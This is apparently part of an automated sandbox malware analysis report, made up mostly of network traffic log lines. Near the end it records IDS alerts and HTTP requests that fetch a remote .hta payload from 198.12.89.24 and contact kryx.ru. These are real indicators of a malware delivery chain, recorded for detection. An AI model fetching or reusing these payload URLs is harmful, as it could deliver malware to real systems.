Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.7:49698
Source: Joe Sandbox ViewIP Address: 198.12.89.24 198.12.89.24
Source: Joe Sandbox ViewIP Address: 188.225.72.170 188.225.72.170
Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficHTTP traffic detected: GET /e3EPl0?&certification=exclusive&kitty=thinkable HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: kryx.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/angel/tsgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
